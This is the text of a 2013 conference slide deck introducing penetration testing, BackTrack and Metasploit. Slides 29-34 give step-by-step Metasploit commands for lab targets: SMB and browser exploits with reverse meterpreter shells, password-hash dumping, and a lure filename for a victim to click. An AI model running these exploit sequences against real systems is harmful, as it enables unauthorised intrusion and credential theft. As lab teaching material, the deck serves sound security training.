iCrOSS 2013_Pentest

1. PENETRATIONTESTINGAND METASPLOITBASIC Presented by Syarif ! Indonesia Creative Open Source Software ( ICrOSS ) 2013 Jakarta, April 25 2013 Balai Kartini

2. Agenda • Why & What’s Penetration Testing ( Pentest ) • << back|track basic overview • Information Gathering & Port Scan ( Demo) • Metasploit Basics & Meterpreter • Challenge ;)

3. Whoami • Just me my self : http://ﬂ3x.us ; @ﬂ3xu5 • InfoSec Enthusiast & Trainer • Lecture & Assistant Manager • CyberCrime Investigator

4. Why Pentest ? • Millions of dollars have been invested in security programs to protect critical infrastructure to prevent data breaches *1) • Penetration Test is one of the most effective ways to identify weaknesses and deﬁciencies in these programs *1)

5. What’s Penetration Testing • A method to evaluate the security of computer system / network • Practice ( attacking ) an IT System like a ‘hacker’ does • Find security holes ( weaknesses ) • Bypass security mechanism • Compromise an organization’s IT system security Must have permission from IT system owner ! illegal activity put you in Jail

6. Ethics • Think before act • Don’t be stupid • Don’t be malicious

7. Pentest Phases Vulnerability Analysis Information Gathering Exploitation Post Exploitation Reporting

8. << back|track overview • . The Most Advanced Linux Security Distribution Open Source & Always be Developed for Security Professional Real World Pentesting Tools

9. << back|track overview • Watch theVideo ! :)

10. << back|track overview

11. << back|track overview

12. What’s • Not just a tool, but an entire framework *1) • an Open source platform for writing security tools and exploits *2) • Easily build attack vectors to add its exploits, payloads, encoders, • Create and execute more advanced attack • Ruby based

13. Metasploit interfaces • MSFconsole • MSFcli • msfweb, msfgui ( discontinued ) • Metasploit Pro, Metasploit Express • Armitage

14. MSFconsole

15. MSFcli

16. Metasploit Terminology • Exploit : code that allow a pentester take some advantages of a ﬂaw within system,application, or service *1) • Payload : code that we want the target system to execute ( few commands to be executed on the target system ) *1) • Shellcode : a set of instructions used as payload when exploitation occurs *1) • Module : a software that can be used by metasploit *1) • Listener : a component for waiting an incoming connection *1)

17. How does exploitation works attacker exploit + payload vulnerable server 1 exploit run , then payload run 2 3 Upload / Download data

18. Traditional PentestVs Metasploit Public Exploit Gathering Change offsets Replace ShellCode Load Metasploit Choose the target OS Use exploit SET Payload Execute Traditional Pentest Metasploit for Pentest

19. Meterpreter • as a payload after vulnerability is exploited *1) • Improve the post exploitation

20. Meterpreter Exploiting a vulnerability Select a meterpreter as a payload meterpreter shell

21. Meterpreter command

26. Pentest Scenario attacker vulnerable OS onVMware * : Ubuntu 8.04 metasploitable *

27. Pentest Skenario • Set network adapter : NAT • Firewall & Windows update : OFF • Fresh OS installed ! • startx

28. OS in the Lab • BackTrack 5 R 3 • IP address : 172.16.150.169 • Windows Xp SP 2 • IP address : 172.16.150.165 • Windows 2003 Server • IP address : 172.16.150.167 • Windows 7 • IP address : 172.16.150.170 • Ubuntu Linux 8.04 ( Metasploitable ) • IP address : 172.16.150.171

29. Windows XP Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.165 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l

30. Windows XP Post Exploitation • session -i 1 • meterpreter > getsystem -h • getuid • hashdump

31. Windows 2003 Server Exploitation • msf > search windows/smb • msf > info exploit/windows/smb/ms08_067_netapi • msf > use exploit/windows/smb/ms08_067_netapi • msf exploit(ms08_067_netapi) > show payloads • msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > set RHOST 172.16.150.167 • msf exploit(ms08_067_netapi) > set LHOST 172.16.150.169 • msf exploit(ms08_067_netapi) > show options • msf exploit(ms08_067_netapi) > exploit • meterpreter > background • session -l

32. Windows 7 Exploitation • msf > use exploit/windows/browser/ms11_003_ie_css_import • msf exploit(ms11_003_ie_css_import) > set PAYLOAD windows/meterpreter/reverse_tcp • msf exploit(ms11_003_ie_css_import) > show options • msf exploit(ms11_003_ie_css_import) > set SRVHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set SRVPORT 80 • msf exploit(ms11_003_ie_css_import) > set URIPATH miyabi-hot.avi • msf exploit(ms11_003_ie_css_import) > set LHOST 172.16.150.169 • msf exploit(ms11_003_ie_css_import) > set LPORT 443 • msf exploit(ms11_003_ie_css_import) > exploit Just wait until the victim open the url http://172.16.150.169:80/miyabi-hot.avi

33. Windows 7 Exploitation • msf exploit(ms11_003_ie_css_import) > sessions -l • msf exploit(ms11_003_ie_css_import) > sessions -i 1 • meterpreter > sysinfo • meterpreter > shell

34. Ubuntu 8.04 Metasploitable Exploitation • search distcc • use exploit/unix/misc/distcc_exec • show payloads • set PAYLOAD cmd/unix/reverse • show options • set rhost 172.16.150.171 • set lhost 172.16.150.169 • exploit

35. Any Question ? Contact me • Website : http://ﬂ3x.us • Twitter : @ﬂ3xu5

36. Greet & Thanks To • BackTrack Linux • Metasploit Team ( HD Moore & rapid7 ) • Offensive Security / Metasploit Unleashed • David Kennedy • Georgia Weidman

37. References ! ! • 1. Metasploit The Penetration Tester’s Guide : David Kennedy , Jim O’Gorman, Devon Kearns, Mati Aharoni • 2. http://www.metasploit.com • 3. http://www.offensive-security.com/metasploit- unleashed/Main_Page • 4. http://www.pentest-standard.org/index.php/ PTES_Technical_Guidelines

38. Challenge in 45 minutes :) • ConnectYour Windows OS to TP LINK Access Point over dhcp • BackTrack 5R3VMWare setting : • Network adapter : Bridge • Get 4 Pictures by your self & shutdown the targets ( if you can :p ) • Win the Polo T-Shirt indobacktrack

39. Challenge in 45 minutes :)

iCrOSS 2013_Pentest

M.Syarifudin, ST, OSCP, OSWP

iCrOSS 2013_Pentest